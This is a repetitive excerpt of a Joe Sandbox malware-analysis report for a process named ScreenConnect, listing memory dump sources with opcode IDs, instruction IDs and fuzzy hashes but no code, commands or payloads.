                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: fecee98a975aa713317a5552e88dba651f8aeaff73b75393c3cf2e56bd067dd4
                                                                                                                                                                                                                  • Instruction ID: 8c586d76c62f2dd78613bdec53d6445249905b694b8b313866a7360e5a7b40c1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fecee98a975aa713317a5552e88dba651f8aeaff73b75393c3cf2e56bd067dd4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9115B72B053446FC7024A68DC11657BFF5EBC5310F2A856BD500CF392EA709E0987D0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 55c34613180e95260b2e6e9df676f526dee748c13ac6344c3188b190c21bd1b9
                                                                                                                                                                                                                  • Instruction ID: 4197f676fe9354f8d8c5b886f2bbf39bfbbbe2a532335da2d4cfa85e42b143da
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55c34613180e95260b2e6e9df676f526dee748c13ac6344c3188b190c21bd1b9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58213E302006058FC734CF6AD848A96BBF1EF84320B048B2DD592976A5DB31EA4ACFD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0b8206854ff3c1bc3af45a86f0a85cb8bd46f7ccc6244f2d4a8389099c183812
                                                                                                                                                                                                                  • Instruction ID: 0595cc4b88ed4cb1ffb6beb6da99662d6ec941da9f64ebabf67f9388bf8ef00e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b8206854ff3c1bc3af45a86f0a85cb8bd46f7ccc6244f2d4a8389099c183812
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E11E2307012055BCB00EB7CE885A6EFBA7EFC4210F408928E509AB398DF70AD09C7D1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6e79db5709ecdf04387c61e62a6a916b7578ae44c720d9b91aaa63fd88892ba7
                                                                                                                                                                                                                  • Instruction ID: 5e8f0066e106f043c54916f5f28a27ad744f24a9c0bd6d3e397cc26107807497
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e79db5709ecdf04387c61e62a6a916b7578ae44c720d9b91aaa63fd88892ba7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12119876A0020A9FCF01DFA8C9409DEBBB5FF49304F148556E505FF265D7316A09CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 3b41490a1e641aa71c4e0a1a4c2616ec77e5872712f91ef8f8e83d9c80e84146
                                                                                                                                                                                                                  • Instruction ID: 8f55d4efb321a840abf7c6aefc1624b693111ddbfead62497d43bce7b34c4717
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b41490a1e641aa71c4e0a1a4c2616ec77e5872712f91ef8f8e83d9c80e84146
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7911A171E01208ABDB14DE69D800AEABBB6EFC4310F08C565E944D7265E7719A02CBD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 869b6ae7204d88c5fa16c67a26eba164e371c9cea112bfd08a7ff95c219c6c11
                                                                                                                                                                                                                  • Instruction ID: dec8482893d392ab55b8b2ebe86eef8bb5662645d50320b283c6a507c3c1ca42
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 869b6ae7204d88c5fa16c67a26eba164e371c9cea112bfd08a7ff95c219c6c11
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1711AD70F01209AFDB14CE6DD810AABBBBAEFC4310F18C46AE504D7264E7719A02CBD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 3dccbce1a92fef0cc48fe5c22b98d5e1619d3d36087c781f3286d1988165b1fa
                                                                                                                                                                                                                  • Instruction ID: 2ecd40cf5a67940eabf4e1ee869477a8e0f3d6542ad53e9f1a238f8fae8e0b80
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dccbce1a92fef0cc48fe5c22b98d5e1619d3d36087c781f3286d1988165b1fa
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9111C3154004DDBCB01DFA8D5948DCFBB2FF85314B59C594E005AB129D772EA86CBE1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b6ec591edd0ae19814411bffb5fed012455036059c6d1ad4fbad99cb11d63fe2
                                                                                                                                                                                                                  • Instruction ID: d8fe2ca341125dd049a9a118d644ecb988e3025be9303b424ac577334faa9060
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ec591edd0ae19814411bffb5fed012455036059c6d1ad4fbad99cb11d63fe2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23111235A0010A9FCF01DFA8D9409DEBBF5FF49314B508569E909BB265D771AE0ACB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: c7b33232050d271cbfdf0016e1a46c8f564994ccf79fc05c12a9c6edd06a8979
                                                                                                                                                                                                                  • Instruction ID: c867861a9be18f0bef2ad903f3a40a0958319b000cef22d711bd633148dab314
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7b33232050d271cbfdf0016e1a46c8f564994ccf79fc05c12a9c6edd06a8979
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29018C316003099FC701DB6CD80456DBBA9EBC9750B0886AED919D7206EB35AA058BD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962632094.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_179d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 85402dbbd25669dba1d575505f51a68c0f45b1e92a1082b171d45b38490968b3
                                                                                                                                                                                                                  • Instruction ID: 3d82cd38aa2bca81d6e44dd731056c4d062ac0e6a66419340ce6689982311dc4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85402dbbd25669dba1d575505f51a68c0f45b1e92a1082b171d45b38490968b3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01F7311083009AEB214AADED84767FF98EF453A4F08C569ED480B286C27A9849C6B1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 115083b2171ce000cfcae63980626ce039cc561d94d0e2b0b2e331cd47adfb1f
                                                                                                                                                                                                                  • Instruction ID: 12ca4f1557f2688e79428bc2cba7b91b45050361a88dcecf95bc87d3988c1b08
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 115083b2171ce000cfcae63980626ce039cc561d94d0e2b0b2e331cd47adfb1f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101AD7620D3408FD355CF28A802796BFE1AB95710F09886EE5C9CB3C1EA72AD45CB55
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b60b60d9c01c64e6e73e468942b4ca59bd1b1ff5dadbe16c785d313779ca87f5
                                                                                                                                                                                                                  • Instruction ID: bcb2ee92f71211400e3d6a05f1c7ab1dc1e46cdd1a2159e3d7e8e428119a1837
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b60b60d9c01c64e6e73e468942b4ca59bd1b1ff5dadbe16c785d313779ca87f5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5F05836B082046BD728CAAAA501A9BBBDECBC5220B14847FE54DC3680E931A54087A8
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962632094.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_179d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 48f4fd795e08a7c7035e647225cb8c1a3b0e3afd4d313dfc74daaff92f5eb7d8
                                                                                                                                                                                                                  • Instruction ID: 8a3ac32d96b18d505f5e3310c3bffafe3bb88047657846623ddad0e6abd68318
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48f4fd795e08a7c7035e647225cb8c1a3b0e3afd4d313dfc74daaff92f5eb7d8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F06271404344AEEB218E1ADCC4B62FFA8EB45664F18C55AED484E296C27A9845CAB1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 4ce08aca9b2e6e4abcd80cf7225b0a6aeb15740ddaf3516c040c9997df86e1d3
                                                                                                                                                                                                                  • Instruction ID: c5559c3c5b7f652382656d6a6439a21c38d0822f698a7906a94ca192e0bd1f99
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ce08aca9b2e6e4abcd80cf7225b0a6aeb15740ddaf3516c040c9997df86e1d3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F0E562B15A926FDB12811C9C066527FDA4B8A365F2E86B2F529CF3C3F610DD0147C2
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 379b8149d38be8377df456143694524de526ef758d94608ce7ed2283793ffabb
                                                                                                                                                                                                                  • Instruction ID: 28a5e3010ad9f6bdcd74b4dec679171cee08b3d91c624722970f77ba96ea08d7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 379b8149d38be8377df456143694524de526ef758d94608ce7ed2283793ffabb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0247250C3804FD312C768B811399BFA1EBD2310B4946EAD085CF2A6E659EA49CB91
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a20720dfebac9465e69cc1b25b6a7cbee8646197fbe444eead501ba7220b12f5
                                                                                                                                                                                                                  • Instruction ID: fe0455aa4058815478bf00edc67f5fe5564252ade8a4173747e91d4f3749107c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a20720dfebac9465e69cc1b25b6a7cbee8646197fbe444eead501ba7220b12f5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A0353023046BD7126B78A85D62A7FA6EBC6632B498126E616CB3C5CE708C0587A4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 48a02b89b73e6bc8156b6364d4957514cbc693fb308ec5cb53fbf9a2c3bffd1d
                                                                                                                                                                                                                  • Instruction ID: 252756e43ae32f2be26ee9b753c59fa9b8c2a33fab0f2abb55af6b1e0b8f59e5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a02b89b73e6bc8156b6364d4957514cbc693fb308ec5cb53fbf9a2c3bffd1d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF0A730909308EFC705CF78DC01559FBB4EB81305F4501AAD549D7251D6309F55DB91
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 9055c1ef824b3dd0a6bf1cb784f872d02ddb6244566db09fb54a9ed62dd2c772
                                                                                                                                                                                                                  • Instruction ID: dfd17c4473471d8560b65376085bc3ffb3ffbaf918a3a5e660e0f0814053a66a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9055c1ef824b3dd0a6bf1cb784f872d02ddb6244566db09fb54a9ed62dd2c772
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3E0D8323543147BDB151AAE788D62BBEDAEBC9722B64403DF30DC7350DE619D0547A1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 1bdeffaec24cc47660e109f3c447d993b0c2f8db827d9cb54a20292c402ee713
                                                                                                                                                                                                                  • Instruction ID: dc3b89708405c36bfa08ca42f8f36f42d1e8d7941383113bae1df90593e5859d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bdeffaec24cc47660e109f3c447d993b0c2f8db827d9cb54a20292c402ee713
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75F0A0313007008B8712D66DA80456EB7AEEBC8B61748942DDC1AC7304DA65ED058BD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 36ef70655521fc2492f31a64cd87f489f3e4729b00f8bceeb89c062bac038e9c
                                                                                                                                                                                                                  • Instruction ID: c8f6807afbc092b0a35f4772429caa20d4afd9a5c73065b160213e7a003e7665
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36ef70655521fc2492f31a64cd87f489f3e4729b00f8bceeb89c062bac038e9c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E04F76A182146FD768CABAA901AAFABEE8BD5220B14C57FE50DD3240E93095418768
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 51a22647743bb0775086b55aab9bee50df82594919b38056d807bdd999365029
                                                                                                                                                                                                                  • Instruction ID: 4aa7a277fae509f0841502aca87484be94bee203d31eff04a5e3280de58814e9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51a22647743bb0775086b55aab9bee50df82594919b38056d807bdd999365029
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E02631310314A78B152AAE748C12EBEDBFBC8632394403DF20EC3300DE719C0543A1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 55002a026814cc9592dd0d2e079cfd138d5782b7c429e83b0b720a89b4deff87
                                                                                                                                                                                                                  • Instruction ID: ade214de5a2652996150e35c40dd38e3a7f5f79a86db2affded512e509c008b4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55002a026814cc9592dd0d2e079cfd138d5782b7c429e83b0b720a89b4deff87
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE09275B057409FC7265730D81C6587FA6FF86762F49809AE51A87295CB369C00CF86
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 2e658d72585ac4adade2c3afc1fdaac0a48cb48106ea8c9aeef50c75a63b26b4
                                                                                                                                                                                                                  • Instruction ID: 8394750696c240ccd6a36cff7b2a4c846d4df17c9dc43877a91e47091ab4ccff
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e658d72585ac4adade2c3afc1fdaac0a48cb48106ea8c9aeef50c75a63b26b4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E02BB050634CAFC701DF74EC46769BBB8DB02315F014099E408C7241D6701E049B42
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 04636cb01511873d24b8aca1adb630ba6832191e5bbc7ac71ee2b5b01f84bc64
                                                                                                                                                                                                                  • Instruction ID: ba430d9b72b9d0fc8a8fa53f99b20ad55c6e9bc03c30072fb60bd8adb318670f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04636cb01511873d24b8aca1adb630ba6832191e5bbc7ac71ee2b5b01f84bc64
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2E08C3A3011187B8B156A7DE40C46EBBAAEBC9272350C126E90AC3388CE708C4287A0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 19cd6ac80b0d6de3cf5b4c6daf82c66f4b753de9c7c33c2b57c8d1b535f01a06
                                                                                                                                                                                                                  • Instruction ID: d40897840c80ff8c9a4fd24c2d8167baee90aba55b9c8b11f90f64d088169dd6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19cd6ac80b0d6de3cf5b4c6daf82c66f4b753de9c7c33c2b57c8d1b535f01a06
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE0D8311087410FC716D62CF80079DBBE2EBC1310F0559E9D0448B2A6D654AD488791
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0ef457f055772fd5b5b79db2ee3353ac60b7010ac5c52c31b65512e717ced95b
                                                                                                                                                                                                                  • Instruction ID: e048067d336a36e66bdf2fc3df2a35cd145ad67d532d1ecbda351a000bc253b8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef457f055772fd5b5b79db2ee3353ac60b7010ac5c52c31b65512e717ced95b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E0E670D0110D6FC780DFBC8E4565EBBF4FB48704F1485A9991DE7241E63596128FD1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 42190ab4e7d8f4e15db2442b9df30c8864cc4caaa3e2f243a29d075401c9028c
                                                                                                                                                                                                                  • Instruction ID: b392a8c0bf47458c0d5ff15a1d86c5873eb7dae3d7295af0af37c7f6be819040
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42190ab4e7d8f4e15db2442b9df30c8864cc4caaa3e2f243a29d075401c9028c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E0ED344597559FC345DB249D06946FBF0AB05600F05C9AED888CB296D2309955DB93
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e4d414f8bbadc0ae2399cc02ac5d48bd5dffeee3f1fb5cb953e7ffa49487ac14
                                                                                                                                                                                                                  • Instruction ID: dfb67c47c6d4697f2bcd38f50181b24e0eb746227eb6db5c5366fb62352db864
